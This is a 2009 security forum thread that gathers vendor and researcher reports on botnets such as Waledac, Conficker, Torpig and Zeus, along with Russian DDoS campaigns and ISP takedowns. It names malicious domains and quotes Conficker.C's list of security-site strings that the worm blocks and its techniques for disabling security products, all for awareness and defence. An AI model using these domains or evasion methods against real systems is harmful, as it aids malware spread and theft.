View Full Version : Pandemic of the botnets 2009

2009-01-07, 18:28
FYI... Please do NOT visit the sites mentioned in the article!

Russia: Opposition Websites and DDoS
- http://asert.arbornetworks.com/2009/01/russia-opposition-websites-and-ddos/
January 6, 2009 - "We’re again seeing reports about political DDoS targets within Russia. This time we saw it mentioned in the blog post Russian Opposition Websites Shut Down By Attacks* from the blog The Other Russia. And again we have data to support the claims. The site www .grani .ru has come under attack from two Black Energy botnets. One of them is well known to many of us, “candy-country .com”, and the other is relatively new on the scene, 22×2x2×22 .com. Both are hard at work with HTTP floods against the site.
Kasparov .ru is back in the news and again being targeted by Black Enegy botnets. 22×2x2×22 .com is striking the site, as well as the well known BE botnet ad .yandexshit .com.... the website of MSK radio, echo .msk .ru, is also under attack by these two botnets. Voices of dissent again being quieted by force.
At least some of these bots participated in the recent DDoS attacks between Russia and Georgia, but they’ve also struck non-political targets quite a bit in the past year or so. Escort sites, gambling sites, etc. Politics is a rough sport in Russia, and the use of DDoS to silence the opposition’s website shows the power of the web in getting a voice out, its value in being silenced, and possibly what’s to come in the future."
* http://preview.tinyurl.com/8nff8b


2009-01-10, 12:09

2008 H2 Fast Flux Data Analysis
- http://asert.arbornetworks.com/2009/01/2008-h2-fast-flux-data-analysis/
January 8, 2009 - "... Comparison and Trends
We’re seeing two trends of note with respect to 2008 with fast flux domain registrations and use. The first is the growth of .CN as a fast flux TLD. Most of the .CN domains we see registered and fluxing come through a registrar like BIZCN, whom we now treat with some suspicion. This could be due to them being negligent or completely subverted, but either way we’re not surprised to see a BizCN registration of a fluxy .CN domain name. We also think that this rapid growth in .CN as a fluxing TLD may be due to a fire sale of .CN domain registrations that occurred late in 2008.
The second big trend over 2008 is the migration away from .COM and .CN to a lot more TLDs. As we noted in our paper earlier this year, by the middle of 2008 more TLDs were being used that had been seen in Thorsten’s previous paper. By the end of 2008 even more TLDs were in use. The long tail is getting longer, meaning more registrars have to be educated and empowered to response to abuse notices with takedowns.
2008 was a very big year for fast flux service hosting, and we’ll continue to see it in 2009. We’re working with more people to analyze such botnets and track their activities, and we’ll be reporting it here."
(Info charts available at the URL above.)


2009-01-15, 00:05

- http://voices.washingtonpost.com/securityfix/2009/01/meet_the_new_bots_will_we_get.html
January 13, 2009 - "The close of 2008 sounded the death knell for some of the most notorious spam networks on the planet. But already several new breeds of spam botnets - massive groups of hacked PCs used for spamming - have risen from the ashes, employing a mix of old and new tricks to all but ensure a steady flow of spam into e-mail boxes everywhere for many months to come... In its January Spam Report* (PDF), McAfee reports that while current spam levels have shown a significant increase in the last few weeks, they are still 40 percent lower than levels prior to the demise of McColo. Symantec, in its State of Spam report** (PDF) for January, says spam levels are now at 80 percent of their pre-McColo-shutdown levels."

* http://www.mcafee.com/us/local_content/reports/mfe_spam_report_jan09.pdf

** http://eval.symantec.com/mktginfo/enterprise/other_resources/b-state_of_spam_report_01-2009.en-us.pdf

- http://www.theregister.co.uk/2009/01/14/botnets_of_2009/
14 January 2009

Spam Botnets to watch in 2009
- http://www.secureworks.com/research/threats/botnets2009/?threat=botnets2009
January 13, 2009

- http://www.marshal.com/trace/traceitem.asp?article=843
January 12, 2009


2009-01-22, 13:30

Inauguration Themed Waledac - New Tactics & New Domains
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090119
January 19, 2009 - "...the Inauguration of Barack Obama and the Waledac trojan has been in full swing attempting to take advantage of the event. Since late last week the trojan has been blasting its way across the Internet with e-mails attempting to bring unwitting users to a page that looks a lot like the official Barack Obama website. The page is updated each day to appear to have a new blog entry... As always do NOT visit these domains as they are malicious and hosting exploit code... Click here* for a full listing of Waledac domains that we are aware of - this link will be updated as we get them. Your best bet is to block these domains or otherwise avoid them..."
* http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
Updated 01-21-2009


2009-01-25, 18:56

Full Waledac Domain Listing
- http://www.securityzone.org/?p=61
January 24, 2009 - "'Got the full list also being updated and posted on the Shadowserver website at the following URL:
Updated 01-25-2009 - 19:10 UTC

...Also, if you are interested in all things Waledac...
http://sudosecure.net/waledac/ "
Waledac Tracker Summary Data

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090124
January 24, 2009 - "...Add those to your block lists and do NOT visit them."


2009-01-29, 14:24

Kyrgyzstan Under DDoS Attack From Russia
- http://preview.tinyurl.com/dfdf84
January 28, 2009 Secureworks blog - "Since January 18, 2009, the two primary Kyrgyzstan ISPs (www .domain .kg, www .ns .kg) have been under a massive, sustained DDoS attack almost identical in some respects to those that targeted Georgia in August 2008. Few alternatives for Internet access exist in Kyrgyzstan. With just two smaller IPSs left to handle the load, these attacks from Russian IP address space have essentially knocked most of the small, Central Asian republic offline. Some believe that this is a way to silence rhetoric from a new and relative powerful opposition coalition whose primary aim is the removal of current government officials, especially Kyrgyz President Kurmanbek Bakiyev, and a break from the administrations policies. On the other hand, others think these attacks are part of a Russian campaign to pressure Kyrgyz President Kurmanbek Bakiyev to close US access to a key airbase, which intensified on the same day as the DDoS attacks. That airbase is a key resource in the war against Islamist militants in Afghanistan... The use of cyber militias puts distance between the Russian government and shelters the it from culpability for the peacetime use of information warfare tactics. There is often a combination of motives... With modern worms capable of quickly building 1+ million strong botnet armies, will we have countermeasures and contingency plans in place when the cross hairs lock-on to our own infrastructure?"

Russian 'cybermilitia' knocks Kyrgyzstan offline
- http://preview.tinyurl.com/akct9k
January 28, 2009 (Computerworld)

- http://atlas.arbor.net/
"...We are investigating ongoing DDoS issues in Kyrgyzstan..."
- http://atlas.arbor.net/summary/dos


2009-01-31, 01:16

Asprox goes phishing again
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090129
29 January 2009 - "The first time around with Asprox, we saw a little bit of phishing. The question with any botnet is "how do they make money off of this?" Phishing is certainly one way. Renting your botnet out to a phishing organization is probably an even better way. Must less risk for you, Mr. Botnet Herder. Today we saw a template update to the drones... Once you fill in some details, your form is submitted to <asprox node>... then your browser is redirected to the homepage of the real bank site. With Asprox's template capabilities, I imagine we'll see more of this."

(Screenshot and more detail available at the URL above.)


2009-01-31, 15:08

Trojan: W32/Waledac
- http://atlas.arbor.net/briefs/index#-47237018
Severity: High Severity
Published: Friday, January 30, 2009 14:30
We have been tracking a new variant of the storm worm for the past month, approximately. This new version, dubbed Waledac, is a new rewrite of the Storm worm's engine but uses the same back end. Nodes are infected through malicious websites and join a P2P managed botnet using HTTP. Once infected, nodes send spam messages related to new infection lures and to pharmacy spam. The botnet also creates a fast flux service network.
Analysis: This is a high severity threat and we have been working with various teams to help dissect the botnet. We do not anticipate that it will be resolved soon.
Source: Trojan:W32/Waledac.gen - http://www.f-secure.com/v-descs/trojan_w32_waledac_gen.shtml
Source: Trojan:W32/Waledac.A - http://www.f-secure.com/v-descs/trojan_w32_waledac_a.shtml "


2009-02-03, 13:20

UkrTeleGroup shutdown...
- http://news.softpedia.com/news/ISP-Hosting-Rogue-DNS-Servers-Shut-Down-103400.shtml
31 January 2009 - "UkrTeleGroup, a notorious ISP based in Ukraine, has been depeered by its uplink provider. In addition to the vast malicious activity originating from its address space, the ISP was also hosting the rogue DNS servers used by the Zlob (DNSChanger) family of trojans. Brian Krebs, journalist at The Washington Post, who also maintains the Security Fix blog, reports* that UkrTeleGroup Ltd. has been known to be involved in online criminal activity since as far back as 2005. As a result, security experts, from the likes of McAfee or the Internet Storm Center**, have recommended blocking all traffic from the IP block owned by the Ukrainian company. The Miami-based FPL FiberNet, which is part of the FPL Group, took the decision to terminate the contract with one of its customers, who was providing uplink to UkrTeleGroup, after receiving a complaint from its own service provider, including an inquiry from Mr. Krebs... The DNSChanger computer trojan comes in many variants, but all of them exhibit the same core concept of forcing the infected computers to use rogue DNS servers. These type of servers are used by computers to resolve domain names to IPs and the gang behind the trojan has proved particularly innovative in finding new ways to hijack them. While the original DNSChanger version was doing nothing more than modifying the Windows HOSTS file in order to override legit DNS responses, its latest mutations are capable of breaking into LAN routers and modifying their settings or hijacking DNS requests from wireless clients and poisoning the replies... Some researchers are pointing that the DNSChanger gang started migrating its servers away from the UkrTeleGroup to other more difficult to reach ISPs in Eastern European countries, such as Latvia, a month ago. But even so, the take down of UkrTeleGroup is bound to hinder the operations of other cyber criminal groups, who used its services to host phishing websites or malware distribution servers.
This latest win for the security community comes after other similar efforts led to the shut down, in 2008, of Atrivo/Intercage, a hosting provider affiliated with the notorious Russian Business Network, or the depeering of the infamous McColo ISP, which served as home for the command and control servers of many of the world's largest spam-sending botnets. ICANN terminating the accreditation of the EstDomains, the favorite domain registrant of cyber criminals, represented an important victory as well."

* http://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.html

** http://isc.sans.org/diary.html?storyid=5434


2009-02-10, 12:51

Botnet controllers for sale
- http://sunbeltblog.blogspot.com/2009/02/botnet-controllers-for-sale.html
February 09, 2009 - "... Now, we see a development shop boasting about its work on malware. Sniffing around an iframedollars trojan, we saw a GET request to promake.me. This resulted in an additional trojan being downloaded..."

(Screenshots available at the URL above.)


2009-02-12, 14:03

Multiple botnets spread Valentine's Day SPAM/malware
- http://preview.tinyurl.com/azlcnw
2009-02-11 - E-week.com "...Researchers at Marshal8e6* have seen three distinct campaigns from three different botnets, as well as spam attacks from botnets they have not yet identified. Most of the Valentine's Day-related spam is coming from Waledac, which appeared on the scene late in 2008. Security pros now believe the botnet is the work of the minds behind the infamous Storm botnet that made headlines in 2007. After being targeted by Microsoft's Malicious Software Removal Tool, Storm limped through most of 2008 before disappearing completely in September... In its place came Waledac, which emerged in December with a blended threat Christmas e-card campaign. Like Storm, Waledac uses a peer-to-peer connection model with fast-flux DNS (Domain Name System) hosting and encrypted communications. Today, researchers speculate that Waledac may comprise as many as 20,000 bots... In addition to Waledac, the Pushdo botnet and others have joined in with their own Valentine's Day campaigns..."
* http://marshal.com/trace/traceitem.asp?article=870
Last Reviewed: February 11, 2009 - "...Please be wary this Valentine’s day and err on the side of caution. Avoid opening Valentine’s day e-card messages unless you can clearly identify and trust the sender."


2009-02-12, 19:33

Joint Effort at Conficker Disruption
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090212
12 February 2009 - "Today Microsoft announced a cooperative effort that has been underway to actively disrupt and contain the Conficker worm outbreak. The Shadowserver Foundation is honored and pleased to be part of this effort which is truly the first of its type. This project brings together those organizations that can effect change at the domain level where the botnet traditionally anchors itself... If these domains can be identified, and have their DNS pointed to a friendly server instead of the C&C, you accomplish several good things. First, you've essentially crippled the botnet, and second you're now able to identify all the infected drones trying to connect to the C&C since they are now attempting connections to that friendly server. Shadowserver has employed various processes to identify the domain names, act as that friendly server, and enumerate the orphaned drones. We add this data to our freely distributed report process which notifies the appropriate network operators that there are infected machines on their network. In the case of Conficker/Downadup, we've actually been watching this for some time, and playing the role of a 'friendly' server for over a month... We at Shadowserver are very hopeful that this effort is foundational, one that will gain traction and attention from those organizations that can make a difference. The issue now is truly global. The botnet scourge is monumental. It requires worldwide coordination and cooperation among industry, government, and law enforcement. Working in silos and in isolation won't work any longer. As a non-profit, vendor-neutral organization, Shadowserver is committed to this effort and in working with other groups dedicated to improving the safety of the Internet..."

- http://www.microsoft.com/Presspass/press/2009/feb09/02-12ConfickerPR.mspx
Feb. 12, 2009

- http://preview.tinyurl.com/aaoefb
02-12-2009 Symantec Security Intel Analysis Team

- http://preview.tinyurl.com/ah9neb
February 12, 2009 (Computerworld)

Third party information on conficker
- http://isc.sans.org/diary.html?storyid=5860
Last Updated: 2009-02-13 06:45:53 UTC - "(This will be updated as more information becomes public)... Removal Instructions, Removal Tools..." etc.

- http://atlas.arbor.net/briefs/index#847040090
February 13, 2009 - "Microsoft has announced that it has been working with various industry partners, Arbor Networks included, to thwart the use of the domain names generated by the Conficker worm to block the attacker from making updates to the worm. Sinkholes are being coordinated to identify infected hosts and to share the data with the necessary parties, as well.
Analysis: This is an unprecedented move and should help keep the worm from growing into a larger problem. The worm continues to spread and the population has grown to as many as 12 million or more..."


2009-02-20, 11:52

- http://mtc.sri.com/Conficker/#fig-libemu
Last Update: 21 February 2009 - "...the Conficker authors have released a variant of Conficker B, which significantly upgrades their ability to flash Conficker drones with Win32 binaries from any address on the Internet. Here, we refer to this variant as Conficker B++... On Feb 16, 2009, we received a new variant of Conficker. At a quick glance, this variant resembles Conficker B. In particular, it is distributed as a Windows DLL file and is packed similarly. Furthermore, dynamic analysis revealed that this domain generation algorithm was identical to that of Conficker B. Hence, we initially dismissed this as another packaging of Conficker B. However, deeper static analysis revealed some interesting differences. Overall, when we performed a comparative binary logic analysis (see Appendix 2 - Horizontal Malware Analysis) comparing Conficker B with Conficker B++, we obtained a similarity score of 86.4%. In particular, we found that out of 297 subroutines in Conficker B, only 3 were modified in Conficker B++ and around 39 new subroutines were added..."

Appendix I: Conficker Census
- http://mtc.sri.com/Conficker/#appendix-1

Appendix 2 - Horizontal Malware Analysis
- http://mtc.sri.com/Conficker/HMA/index.html

- http://blogs.technet.com/mmpc/archive/2009/02/20/updated-conficker-functionality.aspx
February 20, 2009 - "... Future versions of the MSRT will detect this sample as Worm:Win32/Conficker.C* while the MSRT which was released earlier this month detects it as Worm:Win32/Conficker.B. The new sample has modifications which introduce new backdoor functionality. Previous versions of Conficker patched netapi32.dll in memory to prevent further exploitation of the vulnerability addressed by bulletin MS08-067. We’ve discovered that the new variant no longer patches netapi32.dll against all attempts to exploit it. Instead it now checks for a specific pattern in the incoming shellcode and for a URL to an updated payload. The payload only executes if it is successfully validated by the malware. However, there doesn’t appear to be an easy way for the authors to upgrade the existing Conficker network to the new variant. This change may allow the author to distribute malware to machines infected with this new variant. This might be a response to the fact that they no longer have the ability to register many of the Conficker domains... note that this is a polymorphic threat..."
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.C


2009-03-03, 20:29

Waledac coupon campaign & updated Domain List
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090302
March 02, 2009 - ".... The domains are kept updated at the following URL:
• http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
Waledac Domain List - Updated 03-01-2009...
We have also introduced a new URL which is all of the Waledac domains in alphabetical order with no comments or anything else. It currently has 143 domains on it and can be reached via the following URL:
• http://www.shadowserver.org/wiki/uploads/Calendar/waledac_list.txt
These should both be updated at the same time from now on as we add new ones to the list. Please use the domains as you see fit for detecting malicious activity and proactive blocking...
New Theme & Exploits
In the last week or so too, you may have noticed that Waledac recently moved to a new theme about the Economic Crisis and having downloadable coupons. This is just the latest social engineering lure to attempt to get users to install the trojan on their system. Additionally, for some time now, Waledac has been linking to exploit code that it hosts itself. Lately the domain involved seems to frequently be "chatloveonline .com" with an iframe pointing to it and the URL "/tds/Sah7". So be on the lookout and don't visit Waledac domains to avoid the exploits."


2009-03-07, 11:14

Conficker variant - new domain algorithm generates 50,000-a-day...
- http://preview.tinyurl.com/aegncn
03-06-2009 (Symantec Security Response Blog) - "Symantec’s ongoing monitoring of Downadup (a.k.a. Conficker) has today resulted in the observation of a completely new variant being pushed out to systems that are already infected with Downadup. After taking into account the hype surrounding some other recent reports of variants* of Downadup, Symantec is calling this new variant W32.Downadup.C. Our analysis of the sample in question is still ongoing and at an early stage, but our initial findings have already revealed some interesting new attributes for this sample. It does not seem to be using any existing or new means to spread the threat to new machines. It is targeting antivirus software and security analysis tools with the aim of disabling them... Downadup authors have now moved from a 250-a-day domain-generation algorithm to a new 50,000-a-day domain generation algorithm. The new domain generation algorithm also uses one of a possible 116 domain suffixes... The most effective step that organizations and end users can take is to ensure that their computers have up-to-date antivirus software and patches."

* https://forums2.symantec.com/t5/Malicious-Code/A-New-Downadup-Variant/ba-p/391186
02-23-2009 - "... new variant of Downadup (a.k.a. Conficker), which has been dubbed Downadup.B++ or Conficker.C... one could categorize Downadup into three variants..."

- http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-030614-5852-99&tabid=2
Updated: March 6, 2009 10:38:28 PM
Updated: March 7, 2009 5:30:25 PM
Updated: March 8, 2009 9:23:42 AM
Updated: March 11, 2009 4:12:59 PM
Type: Trojan, Worm
Infection Length: 88,576 bytes
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP


2009-03-12, 16:27

- http://blog.trendmicro.com/new-downad-generates-more-urls/
Mar. 11, 2009 - "... yet another variant of the infamous DOWNAD family... DOWNAD (also known as Conficker) is one of the more destructive outbreak worms in the Web threat era, with numbers matching that of giant botnets Storm and Kraken... The two earlier DOWNAD worms, as of this month, has already infected a million PCs based on Trend Micro’s World Virus Tracking Center... Security researchers estimate the global infection at around nine million PCs... added features include the increased number of generated domains, from the earlier the 250 generated by the earlier variants to 50,000. While the worm only attempts to connect to around 500 randomly selected domains at a time, this modification is seen as an effort to add survivability to the DOWNAD botnet... blocking these domains is almost impossible not only because of the daily volume, but also because there is a high possibility legitimate domain collisions where DOWNAD generates domains already in use by legitimate entities. Like the other DOWNAD worms, this new variant also blocks access to antivirus-related sites, as well as terminates security tools..."

- http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-030614-5852-99&tabid=2
Updated: March 11, 2009 - "... If the date and time is on or after 1st April 2009, it uses the date information to generate a list of domain names..."


2009-03-20, 12:53

Conficker C analysis
- http://mtc.sri.com/Conficker/addendumC/
Last Update: 19 March 2009 - "...One major implication from the Conficker B and C variants, as well as other now recently emerging malware families, is the sophistication with which they are able to terminate, disable, reconfigure, or blackhole native operating system (OS) and third-party security services. We provide an in-depth analysis of Conficker's Security Product Disablement logic* ... Those responsible for this outbreak have demonstrated Internet-wide programming skills, advanced cryptographic skills, custom dual-layer code packing and code obfuscation skills, and in-depth knowledge of Windows internals and security products. They are among the first to introduce the Internet rendezvous point scheme, and have now integrated a sophisticated P2P protocol that does not require an embedded peer list. They have continually seeded the Internet with new MD5 variants, and have adapted their code base to address the latest attempts to thwart Conficker. They have infiltrated government sites, military networks, home PCs, critical infrastructure, small networks, and universities, around the world... C then installs several in-memory patches to DLLs, and embeds other mechanisms to thwart security applications that would otherwise detect its presence. C modifies the host domain name service (DNS) APIs to block various security-related network connections (Domain Lookup Prevention), and installs a pseudo-patch to repair the 445/TCP vulnerability, while maintaining a backdoor for reinfection (Local Host Patch Logic). This pseudo patch protects the host from buffer overflows by sources other than those performed by the Conficker authors or their infected peers. Like Conficker B, C incorporates logic to defend itself from security products that would otherwise attempt to detect and remove it. C spawns a security product disablement thread. This thread disables critical host security services, such as Windows defender, as well as Windows services that deliver security patches and software updates. These changes effectively prevent the victim host from receiving automated software updates. The thread disables security update notifications and deactivates safeboot mode as a future reboot option. This first thread then spawns a new security process termination thread, which continually monitors for and kills processes whose names match a blacklisted set of 23 security products, hot fixes, and security diagnosis tools..."
* http://mtc.sri.com/Conficker/addendumC/#SecurityProductDisablement


2009-03-22, 19:31

Third party information on Conficker
- http://isc.sans.org/diary.html?storyid=5860
Last Updated: 2009-03-30 18:34:41 UTC ...(Version: 4)
(See "Removal Tools")


2009-03-28, 14:04
FYI... a few updates on Conficker. Currently, some AV's are "Scanning for 1,328,914 virus strains and unwanted programs...". Conficker is just a few of them.

- http://www.secureworks.com/research/blog/index.php/2009/3/27/conficker-april-fools-hype/
March 27, 2009 - "... If you’re reading this, you’re probably not infected with Conficker.C. If you were already infected, you wouldn’t be able to access any page on secureworks.com, due to the worm author’s apparent dislike for the removal instructions we posted for earlier Conficker variants..."

- http://blogs.technet.com/msrc/archive/2009/03/27/update-on-conficker-d.aspx
March 27, 2009

- http://www.f-secure.com/weblog/archives/00001636.html
March 26, 2009


2009-03-30, 21:31

- http://windowssecrets.com/comp/090330#story1
2009-03-30 - "... Conficker.C interferes with access to sites containing the following strings (as well as scores of other strings not shown here) in any portion of the URL:
antivir ca. cert. conficker f-secure kaspersky mcafee
microsoft msdn. msft. norton panda safety.live sans.
symantec technet trendmicro windowsupdate
... the only people who can access the Conficker removal tools these writers recommend are people whose PCs are -not- infected with Conficker.C... BitDefender has set up a new domain from which users can download free Conficker disinfectant utilities..."
- http://www.bdtools.net/how-to-remove-downadup.php


2009-04-01, 19:02

Third party information on conficker
- http://www.dshield.org/diary.html?storyid=5860
Last Updated: 2009-04-11 18:15:39 UTC ...(Version: 9) <<<
(See "Removal Tools")

Conficker Eye Chart
- http://www.confickerworkinggroup.org/infection_test/cfeyechart.html
04.01.2009 - (See: "Explanation" at bottom of page there)


2009-04-09, 21:30

- http://preview.tinyurl.com/dl3pz9
04-08-2009 Symantec Security Response Blog - "We have come across a system infected with W32.Downadup.C that has provided some interesting information. We discovered some similarly named files, 484528750.exe and 484471375.exe, which had shown up in the \Windows\temp folder within one minute of each other. These files turned out to be W32.Waledac and a modified W32.Downadup variant, respectively..."

- http://www.viruslist.com/en/weblog?weblogid=208187654
April 09, 2009 Kaspersky blog - "The computers infected with Trojan-Downloader.Win32.Kido (aka Conficker.c) contacted each other over P2P, telling infected machines to download new malicious files... once again it’s a worm, and it’s only functional until 3rd May... One of the files is a rogue antivirus app... The first version of Kido, detected back in November 2008, also downloaded fake antivirus to the infected machine. And once again, six months later, we’ve got unknown cybercriminals using the same trick. The rogue software, SpywareProtect2009, can be found on spy-protect-2009 .com., spywrprotect-2009 .com, spywareprotector-2009 .com... Once it’s run, you see the app interface, which naturally asks if you want to remove the threats it’s “detected”. Of course, this service comes at a price - $49.95... At the moment, the rogue antivirus comes from sites located in Ukraine (131-3.elaninet .com. although Kido is downloading it from other sites. The latest version of Kido also downloads Email-Worm.Win32.Iksmas.atz to infected systems. This email worm is also known as Waledac, and is able to steal data and send spam... Both Kido and Iksmas are now present on infected machines and part of the gigantic botnet designed to conduct spam mailings..."
(Screenshots available at the viruslist/Kaspersky URL above.)

- http://www.f-secure.com/weblog/archives/00001652.html
April 9, 2009

- http://asert.arbornetworks.com/2009/04/conficker-did-not-melt-the-internet/
April 9, 2009


2009-04-16, 14:19

New Waledac variant in the wild
- http://securitylabs.websense.com/content/Alerts/3343.aspx
04.16.2009 - " Websense... has detected a new Waledac variant in the wild being distributed via email since yesterday. The new campaign uses a theme whereby the user is enticed to download an application that will permit them to view other people's SMS messages online. The download file uses alternating filenames, including sms.exe, freetrial.exe, and smstrap.exe. ThreatSeeker has identified thousands of spam emails using this theme. Not all major antivirus vendors are currently detecting this threat..."

Waledac - New Campaign, New Domains, GeoCities, and SpywareProtect2009
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090416
16 April 2009

- http://blog.trendmicro.com/new-waledac-campaign-sms-snooping-software/
Apr. 16, 2009

- http://www.f-secure.com/weblog/archives/00001658.html
April 16, 2009

(Screenshots available at all URLs above.)

Fake SMS Reader Spam in Russian Language: Malicious Web Site / Malicious Code
- http://securitylabs.websense.com/content/Alerts/3344.aspx

- http://blog.trendmicro.com/online-casino-geocities-and-waledac/
Apr. 15, 2009 - "... Waledac updated its spam emails and is now spamming online casino advertisements..."
(Screenshots available at the TrendMicro URL above.)


2009-04-22, 13:48

WALEDAC’s latest Spamming fetish
- http://blog.trendmicro.com/waledac%E2%80%99s-latest-spamming-fetish/
Apr. 21, 2009 - "WALEDAC has found a new fetish — spamming users with email messages on free foot fetish movies... clicking the link in the spammed email redirects users to websites featuring foot fetish videos. WALEDAC is notorious for employing various social engineering techniques that leads users to a series of malware infections. This being the third of the recent WALEDAC spam runs we’ve seen, its quite safe to assume we’ll be seeing more of this runs in the near future."
(Screenshots available at the URL above.)

- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090421
21 April 2009


2009-04-22, 13:51

New botnet found - 1.9M bots
- http://www.finjan.com/MCRCblog.aspx?EntryId=2237
Apr 22, 2009 - "... recent discovery of a network of 1.9 million infected computers controlled by cybercriminals... We found that the botnet’s command and control server is hosted in Ukraine. As folders on this server were left open, we were able to get more information for our research. The server has a nice backend management application making it easy for the attackers to manage the infected machines. One of the management console features that we identified is a Command Editing panel through which instructions are sent to the infected machines (bots). We have seen commands asking the bots to download and execute additional malware, download settings files, apply update files etc... This command instructs the bot on the infected computers to download and execute a Trojan horse... only 4 out of 39 Anti-Virus products detected this Trojan... The description field of this command led us to a hacker’s forum in Russia with a post requesting to trade in infected computers... (Another) command instructs the infected machines to download and execute a Trojan horse that later installs a group of other malicious executables without the user’s consent... Overall, the cybergang can remotely execute anything it likes on the infected computers. The log file on the server disclosed the IP addresses of the infected computers and their names in the network..."

(Screenshots available at the URL above.)


2009-04-22, 18:43

Gov systems found on 1.9m zombie botnet
- http://www.theregister.co.uk/2009/04/22/superbotnet_server/
22 April 2009 - "... cybercrooks collectively compromised computers in 77 government-owned domains (.gov) from the UK, US and various other countries. The malware that featured in the attack allowed hackers complete control of compromised PCs, nearly all of which were running Windows XP. A variety of malicious actions, from reading emails to copying files, keystroke logging, and spam distribution were all possible. Since discovering the botnet, Finjan has supplied information to the server to UK and US law enforcement agencies. The command server is now out of commission. Finjan has informed affected corporate and government agencies about infected computer names, in a move that will hopefully result in a clean-up operation..."


2009-04-23, 14:35

Tracking Spam Botnets...
- http://www.marshal8e6.com/trace/bot_statistics.asp
April 12, 2009 - "...spamming botnets are constantly in flux. Botnets morph, become obsolete, replaced, taken down, and upgraded. One thing is clear, a mere handful of botnets are responsible for the bulk of all spam sent. This page pulls together some of the results of our latest research, highlighting details about some of the most notorious spamming botnets..."
(Graphs and more detail available at the Marshal URL above.)

- http://www.theregister.co.uk/2009/04/23/botnet_speed_test/
23 April 2009 - "... Xarvester and Rustock threw off the most junk mail, 25K messages an hour or the equivalent of 600K spams a day. The data on spam rates was harvested from a wider research project into botnets run by Marshal8e6 over the last two years..."


2009-05-04, 18:56

Botnet probe turns up 70GB of personal, financial data
- http://preview.tinyurl.com/cmzd68
May 4, 2009 (Computerworld) - "...it steals personal and financial data. The botnet, known as Torpig or Sinowal, is one of the more sophisticated networks that uses hard-to-detect malicious software to infect computers and subsequently harvest data such as e-mail passwords and online banking credentials. The researchers were able to monitor more than 180,000 hacked computers by exploiting a weakness within the command-and-control network used by the hackers to control the computers. It only worked for 10 days, however, until the hackers updated the command-and-control instructions... Still, that was enough of a window to see the data-collecting power of Torpig/Sinowal. In that short time, about 70GB of data were collected from hacked computers. The researchers stored the data and are working with law enforcement agencies such as the U.S. Federal Bureau of Investigation, ISPs and even the U.S. Department of Defense to notify victims... Torpig/Sinowal can pilfer user names and passwords from e-mail clients such as Outlook, Thunderbird and Eudora while also collecting e-mail addresses in those programs for use by spammers. It can also collect passwords from Web browsers. Torpig/Sinowal can infect a PC if a computer visits a malicious Web site that is designed to test whether the computer has unpatched software, a technique known as a drive-by download attack... The researchers found out that Torpig/Sinowal ends up on a system after it is first infected by Mebroot, a rootkit that appeared around December 2007. Mebroot infects a computer's Master Boot Record (MBR), the first code a computer looks for when booting the operating system after the BIOS runs. Mebroot is powerful since any data that leaves the computer can be intercepted. Mebroot can also download other code to the computer. Torpig/Sinowal is customized to grab data when a person visits certain online banking and other Web sites. It is coded to respond to more than 300 Web sites, with the top targeted ones being PayPal, Poste Italiane, Capital One, E-Trade and Chase bank, the paper said*. If a person goes to a banking Web site, a falsified form is delivered that appears to be part of the legitimate site, but asks for a range of data a bank would not normally request, such as a PIN (personal identification number) or a credit card number.... Web sites using SSL (Secure Sockets Layer) encryption are -not- safe if used by a PC with Torpig/Sinowal, since the malicious software will grab information before it is encrypted..."
* http://www.cs.ucsb.edu/~seclab/projects/torpig/index.html


2009-05-05, 21:43

McAfee: 12M added to botnets Q1-2009
- http://newsroom.mcafee.com/article_display.cfm?article_id=3515
May 05, 2009 - "... cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008... Cybercriminals are building an army of infected, “zombie” computers to recover from last November’s takedown of a central spam-hosting ISP...
Other Key Findings:
• The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone
• Servers hosting legitimate content have increased in popularity with malware writers to distribute malicious and illegal content
• Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their location
• Compared to the overall landscape, the Conficker worm represents a small subset of all threat reports. Autorun malware, a vector used by certain Conficker variants, represented only 10% of all detections reported during the first quarter.
To view the full report, please visit: http://www.mcafee.com/threatsreport ."


2009-05-08, 14:02

Botnet self-destructs - "Zeus" command
- http://voices.washingtonpost.com/securityfix/2009/05/zeustracker_and_the_nuclear_op.html
May 7, 2009 - "... Hüssy oversees Zeustracker*, a Web site listing Internet servers that uses Zeus**, a kit sold for about $700 on shadowy cyber criminal forums to harvest data from computers infected with a password stealing Trojan horse program. One of Zeus's distinguishing features is a tool that helps each installation on a victim PC look radically different from the next as a means to evade detection by anti-virus tools. According to Hüssy, among Zeus's many features is the "kos" option, which stands for "kill operating system"... In early April, Hüssy began tracking a Zeus control server used to receive data stolen from a botnet of more than 100,000 infected systems, mostly located in Poland and Spain. While investigating this newfound Zeus control server, he noticed something unusual: the "kill operating system" had just been issued to all 100,000 infected systems. Hüssy said he has no idea why the botnet was destroyed... Currently, about one-third of the sites listed at Zeustracker are hacked or free Web services..."
* https://zeustracker.abuse.ch/monitor.php?filter=online
** http://rsa.com/blog/blog_entry.aspx?id=1274


2009-05-12, 23:07

- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=217400548
May 12, 2009 - "A pirated version of the new Windows 7 operating system release candidate that has been circulating around the Internet is also building out a botnet. The rogue OS, which is rigged with a Trojan downloader*, at one point had around 27,000 bots in its control as of May 10, when researchers took over the command and control server that communicated with the bots and served them additonal malware. At the height of the botnet buildup, the botmaster was recruiting over 200 machines an hour... Damballa researchers on Sunday grabbed control of the C&C domain, but they say this is likely just one of many versions of rogue Windows 7 OS... Damballa's Cox says most traditional antivirus software is unable to detect the pirated Windows 7 Trojan because the OS itself is infected and most AV solutions don't yet support Windows 7..."
